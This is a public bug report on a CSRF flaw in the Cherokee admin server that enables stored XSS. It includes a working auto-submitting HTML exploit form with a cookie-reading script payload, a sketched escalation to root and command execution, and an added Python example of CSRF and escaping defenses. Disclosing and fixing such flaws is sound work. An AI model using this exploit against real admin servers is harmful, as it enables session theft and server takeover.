csrf & xss issue (resulting from csrf).

Bug #784632 reported by David
This bug affects 1 person
Affects | Status | Importance | Assigned to | Milestone
cherokee (Ubuntu) | Confirmed | Undecided | Unassigned |

Bug Description

Binary package hint: cherokee

The cherokee admin server is vulnerable to csrf.

Using csrf it is possible to produce a persistent xss in several pages - including the 'status' page via the 'nickname field' of a vserver.
An example of this is the following:

<html>
<body>
 <form action="http://127.0.0.1:9090/vserver/apply" method="post" id="xssform">
  <input type="text" name="tmp!new_droot" value='/var/www/'></input>
  <input type="text" name="tmp!new_nick" value='" onselect=alert(1) autofocus> <embed src="javascript:alert(document.cookie)">'></input>
 </form>
 <script>document.getElementById("xssform").submit();</script>
</body>
</html>

A worst-case scenario could be something like the following:
If a user is logged in and the cherokee admin server is running on localhost:9090, then if they visit a $bad page, the bad page may be able to send requests to the server so as to reconfigure it to:

1. run as root
2. the logging of error (or access) will run a command ...
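
The two server-side checks that would stop the form above, as an added example that is not part of the original report and is not Cherokee's code: the state-changing POST is refused unless it comes from the admin UI's own origin and carries a per-session token, and the stored nickname is escaped when rendered. The handler, the `csrf_token` field name, the session key and the `<input>` rendering context are assumptions made for illustration.

```python
import hashlib
import hmac
import html
import secrets
from urllib.parse import urlsplit

# Assumption: the admin UI is only reached at the addresses named in the report.
ADMIN_ORIGINS = {("http", "127.0.0.1", 9090), ("http", "localhost", 9090)}

def new_csrf_token(session_key: bytes) -> str:
    """Per-session token: random nonce plus an HMAC over it."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(session_key, nonce.encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"

def token_is_valid(session_key: bytes, token: str) -> bool:
    nonce, _, mac = token.partition(".")
    want = hmac.new(session_key, nonce.encode(), hashlib.sha256).hexdigest()
    return bool(nonce) and hmac.compare_digest(mac.encode(), want.encode())

def origin_is_admin(headers: dict) -> bool:
    """True only if Origin (or, failing that, Referer) is the admin UI itself."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False  # fail closed when the browser sent neither header
    try:
        url = urlsplit(source)
        return (url.scheme, url.hostname, url.port) in ADMIN_ORIGINS
    except ValueError:
        return False  # malformed URL or port

def apply_vserver(headers: dict, form: dict, session_key: bytes, config: dict) -> int:
    """Hypothetical stand-in for the POST /vserver/apply handler; returns a status."""
    if not origin_is_admin(headers):
        return 403
    if not token_is_valid(session_key, form.get("csrf_token", "")):
        return 403
    config["nick"] = form["tmp!new_nick"]    # stored as submitted
    config["droot"] = form["tmp!new_droot"]
    return 200

def render_nick_field(config: dict) -> str:
    """Escape at output so a stored nickname stays inside the attribute value."""
    return '<input type="text" value="%s">' % html.escape(config["nick"], quote=True)
```

Either check alone leaves a gap: without the origin and token checks any page can still rewrite the configuration, and without output escaping any other write path to the nickname still yields stored script.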


David (d--) wrote :

minor fixy

description: updated
description: updated
Changed in cherokee (Ubuntu):
status: New → Confirmed
visibility: private → public
Jamie Strandboge (jdstrand) wrote :
This report contains Public Security information  
Everyone can see this security related information.
